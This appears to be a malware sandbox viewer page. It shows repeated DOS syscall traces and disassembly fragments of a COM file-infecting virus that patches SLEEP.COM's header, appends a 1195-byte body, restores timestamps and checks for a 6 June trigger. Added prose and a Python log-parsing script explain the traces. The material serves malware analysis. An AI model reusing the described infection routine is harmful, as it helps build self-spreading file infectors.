2018-12-25T11:48:40.104122488Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:40.114588984Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:40.115688742Z 62 PC: 12d21 | Close file
2018-12-25T11:48:40.121093795Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:40.127271085Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:40.129794224Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:40.136579783Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:40.142762215Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:40.144741305Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:40.155663632Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:40.157700723Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:40.164570585Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:40.169099052Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:40.172569872Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:40.175121724Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:40.17720601Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:40.185967688Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:40.187448348Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:40.195070224Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:40.204569946Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:40.20717809Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:40.213897764Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:40.229119985Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:40.231123778Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:40.240944968Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:40.242949796Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:40.249856414Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:40.252596167Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:40.256157802Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:40.25897846Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:40.261088984Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:40.27077607Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:40.272129116Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:40.279827923Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:40.291620431Z 42 PC: 12b53 | Get date (See above)
2018-12-25T11:48:40.293782128Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:40.297676347Z 59 PC: 12db4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":3146,"SideJobID":0}

Syscalls:

Time  Syscall Op (INT 21h function, AH in decimal)  PC (return address after INT 21h)  | Syscall Name
2018-12-25T11:48:40.181368825Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:40.184783599Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:40.189128138Z 26 PC: 12beb | Set disk transfer address
2018-12-25T11:48:40.190011481Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:40.202438596Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.209713305Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:40.216515543Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:40.218732833Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:40.59571518Z 62 PC: 12cbc | Close file
2018-12-25T11:48:40.598376317Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.606329067Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:40.610654135Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.614107265Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.617410837Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:40.621418032Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:40.633052825Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:40.635243794Z 62 PC: 12d21 | Close file
2018-12-25T11:48:40.645333609Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:40.656349259Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:40.659474973Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:40.66718906Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:40.689634093Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:40.693260524Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:40.704824674Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:40.707653128Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:40.715087562Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:40.718023412Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:40.721672722Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:40.724776476Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:40.727207847Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:40.738430682Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:40.740837441Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:40.7497229Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:40.763618576Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:40.766519711Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:40.777126548Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:40.785340496Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:40.788313415Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:40.803055964Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:40.808340344Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:40.81610851Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:40.820064882Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:40.823281411Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:40.827305132Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:40.829487282Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:40.841669017Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:40.844931958Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:40.853932295Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:40.865209479Z 42 PC: 12b53 | Get date (See above)
2018-12-25T11:48:40.869275673Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:40.874801122Z 59 PC: 12db4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":3146,"SideJobID":0}

Syscalls:

Time  Syscall Op (INT 21h function, AH in decimal)  PC (return address after INT 21h)  | Syscall Name
2018-12-25T11:48:40.413051822Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:40.417332163Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:40.421738557Z 26 PC: 12beb | Set disk transfer address
2018-12-25T11:48:40.422649119Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:40.434269557Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.447004634Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:40.453030028Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:40.455232432Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:40.596021611Z 62 PC: 12cbc | Close file
2018-12-25T11:48:40.598474924Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.60622717Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:40.610890381Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.613976866Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.616988458Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:40.620782063Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:40.632217339Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:40.635593475Z 62 PC: 12d21 | Close file
2018-12-25T11:48:40.647673453Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:40.655420565Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:40.657982964Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:40.663081095Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:40.668433688Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:40.66999809Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:40.678443426Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:40.68751846Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:40.695181033Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:40.699548305Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:40.704355268Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:40.708908053Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:40.71153309Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:40.733868062Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:40.735871663Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:40.744782398Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:40.760852993Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:40.764788891Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:40.773357206Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:40.781573424Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:40.783978953Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:40.795367097Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:40.798031371Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:40.802741255Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:40.805014586Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:40.807310957Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:40.809612269Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:40.811033684Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:40.817970417Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:40.820709703Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:40.826260782Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:40.833665629Z 42 PC: 12b53 | Get date
    0x12b53: cmp dx, 0x606
    0x12b57: je 0x12b5c
    0x12b59: jmp 0x12da2
    0x12b5c: jmp 0x12d37
    0x12b5f: and ah, bh
    0x12b61: movsw word ptr es:[di], word ptr [si]
    0x12b62: mov ax, 0x5c4c
    0x12b65: add word ptr [di], ax
    0x12b67: add byte ptr [di - 0x75], dl
    0x12b6a: in al, dx
    0x12b6b: sub sp, 0x2c
    0x12b6e: push si
    0x12b6f: jmp 0x12be0
    0x12b71: mov ah, 0x1a
    0x12b73: lea dx, word ptr [bp - 0x2c]
    0x12b76: int 0x21
    0x12b78: mov ah, 0x4e
    0x12b7a: mov cx, 0x10
    0x12b7d: mov dx, 0x1a2
    0x12b80: add dx, word ptr [0x106]
2018-12-25T11:48:40.836215468Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:40.839852527Z 59 PC: 12db4 | Change current directory
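Every run above shows the same per-file routine between one Find first/next and the next: open the victim, read its first 8 bytes, call Get time, change attributes, close, reopen, write 4 + 2 + 2 bytes from the start of the reopened file (the same 8 bytes it just read), seek, write 1195 bytes (the length in the sample's name), call AH=57h (file date/time) and change attributes again before moving on. The Get time fragment adds DH (seconds) to DL (hundredths) and jumps back to 0x12c9a while the sum is zero, then stores the byte at [0x115 + the delta in 0x106]; what the byte is used for is not visible in the trace. After the directory walk, Get date (AH=2Ah, which returns DH=month and DL=day) is followed by cmp dx, 0x606, so the branch at 0x12b57 selects between 0x12d37 and 0x12da2 on 6 June; the instructions the viewer lists after the unconditional jmp at 0x12b59 are a linear sweep through whatever bytes follow and need not be code. The script below is an added example written for this page, not code from the viewer or the sample: it parses lines in the viewer's format (including the lines where the first disassembled instruction was fused onto the syscall line), splits them into per-file passes, and decodes the date check. `parse_trace`, `infection_passes`, `date_trigger` and `summarise` are this example's own names; the embedded input is abridged from the first run above. Treating the viewer's "See above" as "same annotation as the last annotated event at this PC" is an assumption about the viewer, and for a filename it can hide a different victim, so an inherited name is only a placeholder.

```python
import re

# Constructed sample input, abridged from the first run above: one full infection
# pass, one pass the viewer collapsed to "See above", then the Get date check.
SAMPLE_TRACE = """\
2018-12-25T11:48:40.422649119Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:40.434269557Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.447004634Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:40.453030028Z 44 PC: 12c9e | Get time 0x12c9e: add dl, dh
0x12ca0: je 0x12c9a
2018-12-25T11:48:40.455232432Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:40.598474924Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.60622717Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:40.610890381Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.613976866Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.616988458Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:40.620782063Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:40.632217339Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:40.647673453Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:40.655420565Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:40.657982964Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:40.66999809Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:40.695181033Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:40.699548305Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:40.704355268Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:40.708908053Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:40.71153309Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:40.733868062Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:40.744782398Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:40.833665629Z 42 PC: 12b53 | Get date 0x12b53: cmp dx, 0x606
0x12b57: je 0x12b5c
0x12b59: jmp 0x12da2
"""

# One viewer line: timestamp, AH in decimal, PC, name, optional "(detail)", and on
# the fused lines the first disassembled instruction.
EVENT_RE = re.compile(r"^\S+Z\s+(\d+)\s+PC:\s*([0-9a-f]+)\s*\|\s*(.*?)"
                      r"(?:\s+\((.*)\))?(?:\s+(0x[0-9a-f]+:.*))?$")

def size_of(detail):
    m = re.search(r"(\d+) bytes", detail)
    return int(m.group(1)) if m else 0

def parse_trace(text):
    """Viewer lines -> events. 'See above' is expanded from the last detail seen at the
    same PC (assumed viewer behaviour); an inherited filename may hide a different file."""
    events, last_detail = [], {}
    for line in text.splitlines():
        m = EVENT_RE.match(line)
        if not m:
            if events and line.lstrip().startswith("0x"):   # continuation of inline disassembly
                events[-1]["disasm"].append(line.strip())
            continue                                         # header, blank or config line
        fn, pc, name, detail, first = m.groups()
        pc, detail = int(pc, 16), detail or ""
        if detail == "See above":
            detail = last_detail.get(pc, "")
        elif detail:
            last_detail[pc] = detail
        events.append({"fn": int(fn), "pc": pc, "name": name, "detail": detail,
                       "disasm": [first] if first else []})
    return events

def infection_passes(events):
    """Split at findfirst/findnext (AH=4Eh/4Fh) and summarise what was done to each file."""
    passes, cur, after_seek = [], None, False
    for ev in events:
        fn, detail = ev["fn"], ev["detail"]
        if fn in (0x4E, 0x4F):                     # next directory entry: close the current pass
            if cur and cur["writes"]:
                passes.append(cur)
            cur = dict(file="", header=0, writes=[], body=0, stamp=False, attrib=0)
            after_seek = False
        elif cur is None:
            continue
        elif fn == 0x3D and not cur["file"]:       # open: the first one names the victim
            cur["file"] = detail.partition("'")[2].rstrip("'")
        elif fn == 0x3F:                           # read: header bytes saved before patching
            cur["header"] = size_of(detail)
        elif fn == 0x42:                           # lseek: what follows is appended, not patched
            after_seek = True
        elif fn == 0x40:
            cur["writes"].append(size_of(detail))
            if after_seek:
                cur["body"] = cur["writes"][-1]
        elif fn == 0x57 and cur["writes"]:         # date/time after writing: stamp put back
            cur["stamp"] = True
        elif fn == 0x43:                           # attributes: changed before and after
            cur["attrib"] += 1
    if cur and cur["writes"]:
        passes.append(cur)
    return passes

def date_trigger(events):
    """AH=2Ah returns DH=month, DL=day, so 'cmp dx, imm16' after it is a (month, day) test."""
    for ev in events:
        if ev["fn"] == 0x2A:
            for ins in ev["disasm"]:
                m = re.search(r"cmp dx, 0x([0-9a-f]+)", ins)
                if m:
                    v = int(m.group(1), 16)
                    return v >> 8, v & 0xFF
    return None

def summarise(text):
    events = parse_trace(text)
    passes = infection_passes(events)
    bodies = {p["body"] for p in passes}
    return {"files": [p["file"] for p in passes],
            "header_read": passes[0]["header"] if passes else 0,
            "prefix_writes": passes[0]["writes"][:-1] if passes else [],
            "body_length": bodies.pop() if len(bodies) == 1 else None,
            "restores_timestamp": bool(passes) and all(p["stamp"] for p in passes),
            "resets_attributes": bool(passes) and all(p["attrib"] == 2 for p in passes),
            "date_trigger": date_trigger(events)}
```

`summarise(SAMPLE_TRACE)` reports two passes, an 8-byte header read, prefix writes of 4, 2 and 2 bytes, a constant 1195-byte body after the seek, a date/time call and a second attribute call on every pass, and a (6, 6) date trigger. Feeding it a whole run from the page gives the same answer; the only thing that changes between the runs above is the sandbox clock in the JSON line, and none of those clocks is 6 June, which is why every run ends at 0x12da2 and the Change current directory calls rather than at 0x12d37.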

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":3146,"SideJobID":0}

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:40.435021578Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:40.442753053Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:40.44665668Z 26 PC: 12beb | Set disk transfer address
2018-12-25T11:48:40.447734598Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:40.453736743Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.457881664Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:40.462547662Z 44 PC: 12c9e | Get time
    0x12c9e: add dl, dh
    0x12ca0: je 0x12c9a
    0x12ca2: mov si, 0x115
    0x12ca5: add si, word ptr [0x106]
    0x12ca9: mov byte ptr [si], dl
    0x12cab: mov ax, 0x4301
    0x12cae: xor cx, cx
    0x12cb0: mov dx, si
    0x12cb2: add dx, 0xb4
    0x12cb6: int 0x21
    0x12cb8: mov ah, 0x3e
    0x12cba: int 0x21
    0x12cbc: mov ax, 0x3d02
    0x12cbf: int 0x21
    0x12cc1: jb 0x12c45
    0x12cc3: mov di, dx
    0x12cc5: add di, 0x5d
    0x12cc8: stosw word ptr es:[di], ax
    0x12cc9: xchg ax, bx
    0x12cca: mov ah, 0x40
2018-12-25T11:48:40.465110057Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:40.482908956Z 62 PC: 12cbc | Close file
2018-12-25T11:48:40.489350321Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.497272851Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:40.504471995Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.507315094Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.510171772Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:40.512740769Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:40.522220294Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:40.524026833Z 62 PC: 12d21 | Close file
2018-12-25T11:48:40.534331848Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:40.544355005Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:40.547375247Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:40.555113879Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:40.559568111Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:40.561183216Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:40.569125401Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:40.570609219Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:40.57557275Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:40.57836228Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:40.580185821Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:40.5819838Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:40.586291142Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:40.592070664Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:40.59322363Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:40.599733098Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:40.608445649Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:40.610726379Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:40.624232785Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:40.631037215Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:40.633472906Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:40.64966897Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:40.652221763Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:40.65904066Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:40.66279696Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:40.665976841Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:40.66879838Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:40.6707408Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:40.680510794Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:40.682250284Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:40.690419046Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:40.700896554Z 42 PC: 12b53 | Get date
    0x12b53: cmp dx, 0x606
    0x12b57: je 0x12b5c
    0x12b59: jmp 0x12da2
    0x12b5c: jmp 0x12d37
    0x12b5f: and ah, bh
    0x12b61: movsw word ptr es:[di], word ptr [si]
    0x12b62: mov ax, 0x5c4c
    0x12b65: add word ptr [di], ax
    0x12b67: add byte ptr [di - 0x75], dl
    0x12b6a: in al, dx
    0x12b6b: sub sp, 0x2c
    0x12b6e: push si
    0x12b6f: jmp 0x12be0
    0x12b71: mov ah, 0x1a
    0x12b73: lea dx, word ptr [bp - 0x2c]
    0x12b76: int 0x21
    0x12b78: mov ah, 0x4e
    0x12b7a: mov cx, 0x10
    0x12b7d: mov dx, 0x1a2
    0x12b80: add dx, word ptr [0x106]
2018-12-25T11:48:40.703288188Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:40.707470398Z 59 PC: 12db4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":3146,"SideJobID":0}

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:40.672697568Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:40.676370524Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:40.68128717Z 26 PC: 12beb | Set disk transfer address
2018-12-25T11:48:40.682879917Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:40.69610299Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.703571976Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:40.710715107Z 44 PC: 12c9e | Get time
    0x12c9e: add dl, dh
    0x12ca0: je 0x12c9a
    0x12ca2: mov si, 0x115
    0x12ca5: add si, word ptr [0x106]
    0x12ca9: mov byte ptr [si], dl
    0x12cab: mov ax, 0x4301
    0x12cae: xor cx, cx
    0x12cb0: mov dx, si
    0x12cb2: add dx, 0xb4
    0x12cb6: int 0x21
    0x12cb8: mov ah, 0x3e
    0x12cba: int 0x21
    0x12cbc: mov ax, 0x3d02
    0x12cbf: int 0x21
    0x12cc1: jb 0x12c45
    0x12cc3: mov di, dx
    0x12cc5: add di, 0x5d
    0x12cc8: stosw word ptr es:[di], ax
    0x12cc9: xchg ax, bx
    0x12cca: mov ah, 0x40
2018-12-25T11:48:40.713096144Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:40.735510955Z 62 PC: 12cbc | Close file
2018-12-25T11:48:40.737998837Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.745694092Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:40.749815265Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.752705937Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.755447956Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:40.758630481Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:40.770159261Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:40.772337875Z 62 PC: 12d21 | Close file
2018-12-25T11:48:40.781042342Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:40.793048604Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:40.796424193Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:40.804314206Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:40.813091008Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:40.815633864Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:40.827630461Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:40.833810695Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:40.841482676Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:40.848538477Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:40.852042539Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:40.861576202Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:40.863138318Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:40.87350198Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:40.875615718Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:40.884238718Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:40.896141441Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:40.899205973Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:40.906393358Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:40.913638622Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:40.916221732Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:40.927405321Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:40.929430387Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:40.938068537Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:40.941494162Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:40.946498967Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:40.950318249Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:40.953441265Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:40.963974005Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:40.966310084Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:40.97568912Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:40.986558365Z 42 PC: 12b53 | Get date
    0x12b53: cmp dx, 0x606
